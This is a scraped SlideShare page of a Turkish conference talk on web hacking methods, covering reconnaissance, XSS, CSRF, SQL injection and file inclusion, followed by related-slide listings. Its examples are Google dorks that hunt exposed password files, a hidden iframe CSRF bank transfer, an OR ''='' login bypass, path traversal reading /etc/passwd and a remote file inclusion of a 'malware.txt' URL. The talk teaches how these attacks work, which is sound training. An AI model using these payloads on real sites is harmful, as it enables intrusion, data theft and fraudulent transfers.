SlideShare uma empresa Scribd logo
1 de 32
Web Hacking Yöntemleri
•   Bilgi Teknolojileri Güvenlik Danışmanı
•   White Hat Hacker
•   Ethical Hacking Eğitmeni
•   Blog Yazarı (www.eyupcelik.com.tr)
•   Web Güvenliği Editörü (www.webguvenligi.net)
•   LabSec Community - Güvenlik Ekip Lideri
•   Anatolia Security - Proje Takım Lideri
•   Güvenlik Araştırmacısı (Security Research)
    – PacketStormSecurity.org
    – Exploit-db.com
    – Secunia.com
•   Web Hacking Yöntemleri
     •   Bilgi Toplama
           • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
           • Hata Mesajlarından Bilgi Toplama
           • Arama Motorlarından Bilgi Toplama
           • Alt Dizin ve Admin Panel Keşfi
     •   Web Güvenlik Testlerinde Kişisel Proxyler
     •   OWASP Top 10 Açıklık Rehberi
     •   XSS, CSRF Açıkları ve Kötüye Kullanımı
           • XSS, CSRF Nedir?
           • XSS, CSRF Kullanımı
     •   SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
           • SQL Injection ve Blind SQL Injection Nedir?
           • SQL – Blind SQL Kullanımı
           • SQL Injection Örnekleri
           • Arama Motorlarından Zafiyet Arama
           • Havij, Sqlmap, SQL Finder, Pangolin
     •   File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
           • Local File Inclusion (LFI)
           • Remote File Inclusion (RFI)
     •   Web Shell
           • Web Shell Kavramları ve Kullanım Amaçları
           • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
www.whois.sc
www.intodns.com
Maltego
Sık karşılaşılan hata kodları
• 400 (Söz dizimi çözülemedi)
• 403 (Yasak)
• 404 (Bulunamadı)
• 405 (Yönteme izin verilmiyor)
• 500 (Dahili sunucu hatası)
• 505 (HTTP sürümü desteklenmiyor)
• www.archive.org (Web Arşiv)
• www.google.com
    •   site: eyupcelik.com.tr
    •   Filetype:txt
    •   Password 123123 filetype:xml
    •   Password 123123 filetype:xml site:site.com.tr
    •   intitle:index.of
    •   Intitle:index.of site:gov.tr
    •   intitle:index.of pwd.db passwd site:com
    •   Microsoft-IIS/5.0 server at
    •   Apache/2.2 Server at
• www.bing.com
    •   IP: 192.168.1.100
• Kariyer Siteleri
• (Kariyer.net, yenibiris.com. SecretCV)
•   Web Hacking Yöntemleri
     •   Bilgi Toplama
           • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
           • Hata Mesajlarından Bilgi Toplama
           • Arama Motorlarından Bilgi Toplama
           • Alt Dizin ve Admin Panel Keşfi
     •   Web Güvenlik Testlerinde Kişisel Proxyler
     •   OWASP Top 10 Açıklık Rehberi
     •   XSS, CSRF Açıkları ve Kötüye Kullanımı
           • XSS, CSRF Nedir?
           • XSS, CSRF Kullanımı
     •   SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
           • SQL Injection ve Blind SQL Injection Nedir?
           • SQL – Blind SQL Kullanımı
           • SQL Injection Örnekleri
           • Arama Motorlarından Zafiyet Arama
           • Havij, Sqlmap, SQL Finder, Pangolin
     •   File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
           • Local File Inclusion (LFI)
           • Remote File Inclusion (RFI)
     •   Web Shell
           • Web Shell Kavramları ve Kullanım Amaçları
           • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
•   Sunucuya gönderilen yazılım betiklerinin (script) kullanıcının tarayıcısında çalıştığı bir
    saldırı türüdür.
•   PHP-ASP-ASP.NET Sayfalarında sıklıkla görülür.
•   Genellikle POST ve GET metotlarının kullanıldığı alanlarda olur.
•   Yazılım betiklerinin kullanıcı tarafında çalıştırılması sonucunda oturum bilgileri
    çalınabilir, bilgisayarına zararlı kodlar enjekte edilebilir ve bilgisayar yönetimi ele
    geçirilebilir.
•   En çok karşılaşılan güvenlik zafiyetidir!
• XSS
   • Reflected XSS Attack
   • Stored (Persistent) XSS Attack
•   URL adreslerindeki querystringler ve form alanlarında sıklıkla görülür.
•   En çok karşılaşılan XSS saldırı türevidir.
•   Kullanıcı taraflı çalışır.
•   Phishing saldırılarına zemin oluşturur.
• Forumlar, ziyaretçi defterleri gibi alanlarda sıklıkla görülür.
• XSS kodları database sunucusuna kaydedilir.
• Kullanıcılar sayfaya eriştiklerinde XSS kodları çalışır ve amaca hizmet eder.
• XSS saldırısına benzer
• Web uygulamasının oturum zaman aşımlarını kullanmamasından kaynaklanır.
• XSS saldırılarının aksine CSRF saldırıları kullanıcı bazlıdır.
• Bu saldırı türünde, kullanıcının isteği dışında kullanıcıya işlemler yaptırılır.
• Banka hesaplarından para transferi, uygulama yetki yükseltme saldırıları gibi bir
  çok işlem bu saldırı yöntemi ile yapılabilmektedir.
• Saldırganın amacı; yetkisi olmayan alanlarda istediği işlemi yetkisi olan bir
  kullanıcıya yaptırmaktır.
• Örneğin; ING Direct bankasında bulunan CSRF zafiyeti, kullanıcının belirtilen
  hesaba para transfer etmesini sağlamaktaydı.
• Web sitesinde oturum açan bir kullanıcı, eğer aynı zamanda zararlı kodun
  bulunduğu sayfaya erişirse, hesabından başka bir hesaba para aktarılıyor
• Kullanıcı uygulamayı açtıktan sonra, zararlı sayfada
  http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500
  &submit=1 kodu çalıştırılır.
• Bunun için saldırgan yukarıda bulunan kodu sayfasında <img> veya <iframe>
  tagları arasına yerleştirir.
• Bu tagler kullanıcının görmemesi için
<img src=‚http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛
width=‚0‛ height=‚0‛> şeklinde yada
<iframe src=‚http://www.banka.com/ParaYollar.php?Gonderen=Eyup&Alici=Ismail&Miktar=500&submit=1‛
width=‚0‛ height=‚0‛> şeklinde olacaktır.
• Bu kodlar kullanıcı tarafında çalışınca, Eyup adlı kullanıcın hesabından Ismail
  adlı kullanıcın hesabına 500 TL aktarmış olacaktır.
•   Web Hacking Yöntemleri
     •   Bilgi Toplama
           • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
           • Hata Mesajlarından Bilgi Toplama
           • Arama Motorlarından Bilgi Toplama
           • Alt Dizin ve Admin Panel Keşfi
     •   Web Güvenlik Testlerinde Kişisel Proxyler
     •   OWASP Top 10 Açıklık Rehberi
     •   XSS, CSRF Açıkları ve Kötüye Kullanımı
           • XSS, CSRF Nedir?
           • XSS, CSRF Kullanımı
     •   SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
           • SQL Injection ve Blind SQL Injection Nedir?
           • SQL – Blind SQL Kullanımı
           • SQL Injection Örnekleri
           • Arama Motorlarından Zafiyet Arama
           • Havij, Sqlmap, SQL Finder, Pangolin
     •   File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
           • Local File Inclusion (LFI)
           • Remote File Inclusion (RFI)
     •   Web Shell
           • Web Shell Kavramları ve Kullanım Amaçları
           • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
• Veritabanından sorgulamalar yapılırken, sorgulara bazı karakterlerin (‘)
  eklenerek yetkisiz sorgulamalar yapılmasıdır.
• SQL injection yöntemi ile sql sunucusunda bulunan verilere
  erişilebilir, değiştirilebilir , silinebilir
• SQL Injection son zamanlarda en tehlikeli saldırı türlerinden biri haline geldi.
• Web uygulamalarında bulunan SQL sorgularının doğru bir şekilde analiz
  edilmeden SQL sunucusuna aktarılmasından kaynaklanan bir saldırı türüdü
• SQL’de iki tek tırnak (‘) yan yana gelince arada bulunan kodlar ‚string‛ olarak
  kabul edilir.
• Örneğin; bir userın form alanına giriş yapacağı zaman girmiş olduğu input
  değerler kontrol edilirken sql cümlecikleri kullanılır.
• SELECT * from kullanicilar where isim=‘eyup’ and sifre=‘x9x9’
• Böyle bir durumda, kullanıcılar tablosunda bulunan isim kolonunda ‚eyup‛ varsa
  ve sifre kolonıundaki şifresi de eğer ‚x9x9‛ ise kullanıcı oturum açmış olacaktır.
• Kullanıcının form alanına girmiş olduğu input veriler where koşuluna
  atanmaktadır.
• Bu mantıkla çalışan bir sitede sql injection saldırısı yapacaksak eğer, bize
  kullanıcı adı ve şifreyi her zaman döndürecek bir koda ihityacımız olacaktır.
• Select * from kullanicilar where isim=‘’ OR ‘’ = ‘’ and sifre= ‘’ OR ‘’ = ‘’
• Kullanıcılar tablosundaki isim kolonu ve sifre kolonu boş olan kullanıcıları
  istemiş olduk.
• ODBC (Open Database Connectivity) verikaynakları üzerinde veri taşımaya
  yarayan bir araçtır.
• Bu işlemi verikaynağı ve uygulama arasında bir katman oluşturarak
  gerçekleştirir.
• Error Based SQL Injection saldırıları, ODBC’nin verdiği hatalardan faydalanarak
  verilere erişmeye çalışır.
• Çoğunlukla SQL Union operatöründen faydalanılarak bu hata verilerine erişilir.
• SQL injectionda kullanılan karakterlerin sonuç vermediği durumlarda kullanılan
  bir saldırı yöntemidir.
• Bu yöntem alınan hataların True veya False kısmı ile ilgilenir.
• SQL üzerinde yapılan sorgulamaların doğru veya yanlış olduğu sonuçlarını bize
  geri döndürür.
• Blind SQL Injection ile yapılan yöntemler deneme-yanılma yöntemi ile yapılır.
•   Web Hacking Yöntemleri
     •   Bilgi Toplama
           • Web Sunucusu, Uygulama, Yazılım Dili, Versiyon Keşfi
           • Hata Mesajlarından Bilgi Toplama
           • Arama Motorlarından Bilgi Toplama
           • Alt Dizin ve Admin Panel Keşfi
     •   Web Güvenlik Testlerinde Kişisel Proxyler
     •   OWASP Top 10 Açıklık Rehberi
     •   XSS, CSRF Açıkları ve Kötüye Kullanımı
           • XSS, CSRF Nedir?
           • XSS, CSRF Kullanımı
     •   SQL Injection Zafiyetleri ve Hacking Amaçlı Kullanımları
           • SQL Injection ve Blind SQL Injection Nedir?
           • SQL – Blind SQL Kullanımı
           • SQL Injection Örnekleri
           • Arama Motorlarından Zafiyet Arama
           • Havij, Sqlmap, SQL Finder, Pangolin
     •   File Inclusion Zafiyetleri ve Hacking Amaçlı Kullanımları
           • Local File Inclusion (LFI)
           • Remote File Inclusion (RFI)
     •   Web Shell
           • Web Shell Kavramları ve Kullanım Amaçları
           • PHP, ASP, JSP, ASP.NET Shell Çeşitleri
•   Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir
•   Sunucuda bulunan dosyaların çağrılmasına ve okunabilmesine olanak verir
•   Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir!
•   index.php?SayfaAc=iletisim.php
•   index.php?SayfaAc=../../configuration.php
•   index.php?SayfaAc=../../../../etc/passwd
•   index.php?SayfaAc=../../../boot.ini
• Web sitesinde bulunan kodlama hatalarından (include, require) meydana gelir
• RFI saldırılarında en büyük etken değişkene değer atanmamasıdır!
• Tanımlanmış ancak değer atanmamış olan değişkene dışardan değer aktarılması
  ile oluşur.
• Sadece bulunduğu siteyi değil, sunucuda bulunan tüm siteleri etkileyebilir!
• include($deger‛.php‛)
• index.php?deger=http://www.site.com/malware.txt
Web Guvenligi Konferansi - Web Hacking Yontemleri
Web Guvenligi Konferansi - Web Hacking Yontemleri

Mais conteúdo relacionado

Mais procurados

Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)PRISMA CSI
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...CypSec - Siber Güvenlik Konferansı
 
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıPRISMA CSI
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriPRISMA CSI
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıCypSec - Siber Güvenlik Konferansı
 
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBGA Cyber Security
 
Web Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriWeb Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriTalha Kabakus
 
Hackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi GüvenliğiHackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi GüvenliğiBGA Cyber Security
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciPRISMA CSI
 
Rusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarRusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarAlper Başaran
 
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Alper Başaran
 
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeWeb Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeErkan Başavcı
 
Hacking Uygulamaları ve Araçları
Hacking Uygulamaları ve AraçlarıHacking Uygulamaları ve Araçları
Hacking Uygulamaları ve AraçlarıMustafa
 
WannaCry - NotPetya Olayları
WannaCry - NotPetya OlaylarıWannaCry - NotPetya Olayları
WannaCry - NotPetya OlaylarıAlper Başaran
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıBGA Cyber Security
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizifangjiafu
 
Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14   client-side security & csp (1)Siber güvenlik konferansı' 14   client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)Mehmet Ince
 

Mais procurados (19)

Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
Beyaz Şapkalı Hacker CEH Eğitimi - Pasif Bilgi Toplama (OSINT)
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
 
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
 
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
 
Web Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma YöntemleriWeb Saldırı Teknikleri & Korunma Yöntemleri
Web Saldırı Teknikleri & Korunma Yöntemleri
 
Hackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi GüvenliğiHackerların Gözünden Bilgi Güvenliği
Hackerların Gözünden Bilgi Güvenliği
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz Süreci
 
Rusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarRusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılar
 
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
 
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve DeğerlendirmeWeb Uygulamalarında Risk Yönetimi ve Değerlendirme
Web Uygulamalarında Risk Yönetimi ve Değerlendirme
 
Hacking Uygulamaları ve Araçları
Hacking Uygulamaları ve AraçlarıHacking Uygulamaları ve Araçları
Hacking Uygulamaları ve Araçları
 
WannaCry - NotPetya Olayları
WannaCry - NotPetya OlaylarıWannaCry - NotPetya Olayları
WannaCry - NotPetya Olayları
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Sızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma SaldırılarıSızma Testlerinde Parola Kırma Saldırıları
Sızma Testlerinde Parola Kırma Saldırıları
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizi
 
Siber güvenlik konferansı' 14 client-side security & csp (1)
Siber güvenlik konferansı' 14   client-side security & csp (1)Siber güvenlik konferansı' 14   client-side security & csp (1)
Siber güvenlik konferansı' 14 client-side security & csp (1)
 
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale EgitimiBTRisk - Siber Olay Tespit ve Mudahale Egitimi
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
 

Destaque

SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMABGA Cyber Security
 
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI BGA Cyber Security
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber Security
 
Bilge adam beşiktas şube ceh 2 hacking
Bilge adam beşiktas şube ceh 2  hackingBilge adam beşiktas şube ceh 2  hacking
Bilge adam beşiktas şube ceh 2 hackingEPICROUTERS
 
Atilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunumAtilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunumEPICROUTERS
 
x86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislikx86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislikcanyoupwn.me
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
İnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit Yöntemleriİnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit YöntemleriBGA Cyber Security
 
Siber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarSiber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19BGA Cyber Security
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ BGA Cyber Security
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarBGA Cyber Security
 

Destaque (17)

SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
 
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
Bilge adam beşiktas şube ceh 2 hacking
Bilge adam beşiktas şube ceh 2  hackingBilge adam beşiktas şube ceh 2  hacking
Bilge adam beşiktas şube ceh 2 hacking
 
Atilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunumAtilim üniversitesi ceh sunum
Atilim üniversitesi ceh sunum
 
x86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislikx86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislik
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
İnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit Yöntemleriİnternet Üzerinde Anonimlik ve Tespit Yöntemleri
İnternet Üzerinde Anonimlik ve Tespit Yöntemleri
 
Siber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarSiber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka Kapılar
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
 
Sızma Testleri Sonuç Raporu
Sızma Testleri Sonuç RaporuSızma Testleri Sonuç Raporu
Sızma Testleri Sonuç Raporu
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan Saldırılar
 
Metasploit Framework Eğitimi
Metasploit Framework EğitimiMetasploit Framework Eğitimi
Metasploit Framework Eğitimi
 
PAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARIPAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARI
 

Semelhante a Web Guvenligi Konferansi - Web Hacking Yontemleri

Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Securitymtimur
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Murat KARA
 
Web servisi güvenliği
Web servisi güvenliğiWeb servisi güvenliği
Web servisi güvenliğiEmrah Gürcan
 
Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Gazi Universitesi Bilisim Gunleri '09
Gazi Universitesi Bilisim Gunleri '09Onur YILMAZ
 
Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul Burp Suite İle File Upload Attack | OWASP Istanbul
Burp Suite İle File Upload Attack | OWASP Istanbul Rumeysa Bozdemir
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH
 
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİCRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİ
CRYPTTECH NG ÜRÜNLERİ ÖZELLİKLERİTulay Candar
 
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14
Client-Side Security & csp - Mehmet İnce #SiberGuvenlikKonferansi 14.05.14Siber Güvenlik Derneği
 
PHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı GüçlendirinPHPkonf'15 - PHP Uygulamanızı Güçlendirin
PHPkonf'15 - PHP Uygulamanızı GüçlendirinMuhittin Özer
 
Ozgur web teknolojileri'13
Ozgur web teknolojileri'13Ozgur web teknolojileri'13
Ozgur web teknolojileri'13Mehmet Ince
 
Balkanay Web Sunum
Balkanay Web SunumBalkanay Web Sunum
Balkanay Web Sunumeroglu
 

Semelhante a Web Guvenligi Konferansi - Web Hacking Yontemleri (20)

Web Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liğiWeb Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liği
 
Owasp top 10 inceleme
Owasp top 10 incelemeOwasp top 10 inceleme
Owasp top 10 inceleme
 
Dogus University-Web Application Security
Dogus University-Web Application SecurityDogus University-Web Application Security
Dogus University-Web Application Security
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Zed attack-proxy-web
Zed attack-proxy-webZed attack-proxy-web
Zed attack-proxy-web
 
Sql Injection
